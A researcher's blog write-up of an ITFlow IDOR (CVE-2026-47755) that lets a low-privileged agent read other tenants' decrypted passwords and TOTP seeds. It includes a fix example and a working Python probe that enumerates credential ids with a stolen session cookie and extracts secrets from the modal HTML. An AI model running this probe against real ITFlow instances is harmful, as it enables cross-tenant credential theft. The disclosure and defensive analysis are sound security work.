cross-tenant credential disclosure in itflow

May 25, 2026

TL;DR

This one came from ITFlow and ended up as CVE-2026-47755.

The bug was simple in a very bad way: a low-privileged authenticated agent could request another client’s credential edit modal directly and get back decrypted secrets that should never have been exposed to them.

Not hashed junk. Not partial leakage. Actual useful stuff:

  • plaintext passwords
  • usernames
  • TOTP seeds
  • and even live TOTP values through a related endpoint

Why I liked this one

I always like bugs where the normal UI says one thing, but the actual backend says something else entirely.

In the UI, the restricted user could only see their own client. Everything looked fine there.

But the moment you stop clicking around normally and just ask the modal endpoint for another credential_id, the whole boundary falls apart.

That is the kind of bug that feels clean when you confirm it. No weird setup. No fragile exploit chain. Just an insecure direct object reference (IDOR) on sensitive data: the endpoint trusts the id parameter and never asks whether the caller is allowed to see that object.

The vulnerable endpoint

GET /agent/modals/credential/credential_edit.php?id=<credential_id>

According to the advisory, the endpoint only required an authenticated session and then looked up the requested credential directly by ID.

That means the attack path was basically:

  1. log in as a low-privileged agent
  2. keep the valid session cookies
  3. request another tenant’s credential_id
  4. receive decrypted secrets inside the returned modal HTML

That is about as straightforward as it gets.

What was missing

The core problem was object-level authorization.

The advisory explicitly says the endpoint did not:

  • call enforceClientAccess()
  • verify that the credential belonged to a client the current user was allowed to access
  • stop decrypted secret material from being rendered back into the HTML response

So even though the restricted user was scoped correctly in the visible UI, the modal endpoint ignored that tenant boundary.
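To make the missing check concrete, here is an added example (my own code, not ITFlow's) that models the modal endpoint twice: first as the advisory describes it, where any valid session can fetch any credential id, and then with the object-level authorization the advisory says was absent. The data, the stand-in `decrypt()`, and the names `enforce_client_access`, `CREDENTIALS` and `USER_CLIENTS` are all constructed for the example.

```python
# Added example (not ITFlow's code): a minimal model of the modal endpoint,
# first as the advisory describes it (lookup by id only), then with the
# object-level authorization check that was missing. Names such as
# enforce_client_access, CREDENTIALS and USER_CLIENTS are stand-ins.

# Constructed sample data: two clients, one credential each. Secrets are
# stored "encrypted" with a trivial marker so the example runs offline;
# a real application would use its key-wrapped encryption here.
CREDENTIALS = {
    1: {"client_id": 1, "username": "admin@client-one.example",
        "password_enc": "enc:Client0neP@ss", "otp_secret_enc": "enc:JBSWY3DPEHPK3PXP"},
    2: {"client_id": 2, "username": "admin@client-two.example",
        "password_enc": "enc:ClientTw0P@ss", "otp_secret_enc": "enc:KRSXG5CTMVRXEZLU"},
}

# Which clients each logged-in user may see. The restricted agent is scoped
# to client 1 only, which is exactly what the normal UI shows them.
USER_CLIENTS = {
    "restricted-agent": {1},
    "admin": {1, 2},
}


def decrypt(blob: str) -> str:
    """Stand-in for the application's secret decryption."""
    if not blob.startswith("enc:"):
        raise ValueError("not an encrypted blob")
    return blob[len("enc:"):]


def render_modal(cred: dict) -> dict:
    """What the modal hands back to the browser: plaintext secrets."""
    return {
        "username": cred["username"],
        "password": decrypt(cred["password_enc"]),
        "otp_secret": decrypt(cred["otp_secret_enc"]),
    }


def credential_edit_vulnerable(user: str, credential_id: int) -> dict:
    """Pattern described by the advisory: any valid session may fetch any id."""
    if user not in USER_CLIENTS:            # the only check: is there a session?
        raise PermissionError("not logged in")
    cred = CREDENTIALS.get(credential_id)
    if cred is None:
        raise LookupError("no such credential")
    return render_modal(cred)               # decrypted regardless of owning client


def enforce_client_access(user: str, client_id: int) -> None:
    """Object-level check: may this user touch this client at all?"""
    if client_id not in USER_CLIENTS.get(user, set()):
        raise PermissionError(f"user {user!r} may not access client {client_id}")


def credential_edit_hardened(user: str, credential_id: int) -> dict:
    """Same lookup, but the owning client is resolved from the credential row
    and checked before any secret is decrypted or rendered."""
    if user not in USER_CLIENTS:
        raise PermissionError("not logged in")
    cred = CREDENTIALS.get(credential_id)
    if cred is None:
        raise LookupError("no such credential")
    enforce_client_access(user, cred["client_id"])   # the missing step
    return render_modal(cred)


if __name__ == "__main__":
    # The restricted agent asks for Client Two's credential (id=2).
    print("vulnerable:", credential_edit_vulnerable("restricted-agent", 2))
    try:
        credential_edit_hardened("restricted-agent", 2)
    except PermissionError as err:
        print("hardened:", err)
```

Two details matter in the hardened version. The client being checked comes from the credential row itself, never from a client_id the request could supply, so there is nothing for the caller to tamper with. And the check runs before decryption, so a denied request never touches secret material at all; whether the denial is surfaced as 403 or as a generic 404 (which also hides whether the id exists) is a separate choice. The related endpoint the advisory mentions for live TOTP values needs the same check in the same place.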

Why the impact is real

This was not just “you can see a name you should not see.”

The returned modal could include:

  • credential username
  • credential password
  • OTP secret

And the advisory also notes a related endpoint that could leak the live TOTP token cross-tenant too.

At that point, this is not a cosmetic tenant-isolation issue anymore. It is direct secret disclosure across clients.

The part that made it nice as a find

What I liked here is that the exploit path was easy to explain.

The restricted user could not see Client Two in the normal interface, but could still request credential_id=2 directly and recover the secret material from the modal response.

That kind of before-and-after is always good evidence:

  • normal UI says access is restricted
  • direct object request shows that restriction was enforced only in the UI, not at the endpoint
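The attack path listed earlier and the before-and-after evidence here are easy to script. The following is an added example, my own code rather than anything from the post or the ITFlow project: it replays the modal request for a range of credential ids using one saved low-privileged session and reports any id outside the account's own client that came back with secrets. The modal path is the one from the advisory; the input names `username`, `password` and `otp_secret` are an assumption about the modal's markup and may need adjusting for a real instance, and `SAMPLE_MODAL` is a constructed response used so the parser can be exercised offline.

```python
# Added example, not from the original post: a small probe that replays the
# attack path with one low-privileged session. The modal path is the one
# from the advisory; the input names (username, password, otp_secret) are an
# assumption about the modal's markup and may need adjusting.
from html.parser import HTMLParser
import urllib.error
import urllib.request

MODAL_PATH = "/agent/modals/credential/credential_edit.php?id={}"
SECRET_FIELDS = ("username", "password", "otp_secret")  # assumed field names


class _ModalInputs(HTMLParser):
    """Collect value= of <input> tags whose name is one we care about."""

    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        attr = dict(attrs)          # attribute order in the markup does not matter
        name = attr.get("name")
        if name in SECRET_FIELDS and attr.get("value") is not None:
            self.fields[name] = attr["value"]


def extract_modal_secrets(modal_html: str) -> dict:
    """Pull the secret fields out of a returned modal body."""
    parser = _ModalInputs()
    parser.feed(modal_html)
    return parser.fields


def fetch_modal(base_url: str, session_cookie: str, credential_id: int, timeout: int = 10):
    """GET the modal with the saved session cookie; returns (status, body)."""
    url = base_url.rstrip("/") + MODAL_PATH.format(int(credential_id))
    req = urllib.request.Request(url, headers={"Cookie": session_cookie})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def probe(candidate_ids, allowed_ids, fetch):
    """Request each candidate id through `fetch(cid) -> (status, body)` and
    return the secrets that came back for ids the session should not see."""
    leaked = {}
    for cid in candidate_ids:
        status, body = fetch(cid)
        if status != 200:
            continue
        secrets = extract_modal_secrets(body)
        if secrets and cid not in allowed_ids:
            leaked[cid] = secrets
    return leaked


# Constructed sample response, standing in for what a live instance returned.
SAMPLE_MODAL = """
<div class="modal-body">
  <input type="text" class="form-control" name="username" value="admin@client-two.example">
  <input type="password" value="ClientTw0P@ss" name="password" class="form-control">
  <input name="otp_secret" type="text" value="KRSXG5CTMVRXEZLU">
  <input type="hidden" name="credential_id" value="2">
</div>
"""

if __name__ == "__main__":
    import sys
    # usage: probe.py https://itflow.example "PHPSESSID=..." 1,4   (ids the account may see)
    base, cookie = sys.argv[1], sys.argv[2]
    allowed = {int(x) for x in sys.argv[3].split(",")}
    found = probe(range(1, 50), allowed, lambda cid: fetch_modal(base, cookie, cid))
    for cid, secrets in found.items():
        # Print usernames as evidence, mask the actual secret material.
        print(cid, {k: (v if k == "username" else "*" * 6) for k, v in secrets.items()})
```

`probe` takes the fetch function as a parameter so the same logic can be run against captured responses without a live target, and the stand-alone run masks passwords and OTP seeds in its output, since the point of the evidence is which ids answered, not the secrets themselves.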

Severity and CVSS

The public advisory lists this as Moderate with:

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

The vector reads the way the bug behaves: PR:L because any valid low-privileged agent account is enough, AC:L and UI:N because a single crafted GET with the session cookie does the job, C:H because complete credentials and OTP seeds are disclosed, and I:N/A:N because the endpoint is read-only. That works out to a base score of 6.5, which is Medium on the CVSS scale and Moderate in GitHub's advisory terminology.

Affected version

The advisory lists:

  • Package: itflow-org/itflow
  • Affected: <= 26.04
  • Patched: None

So at the time of the public advisory, there was no patched version listed yet.

Reference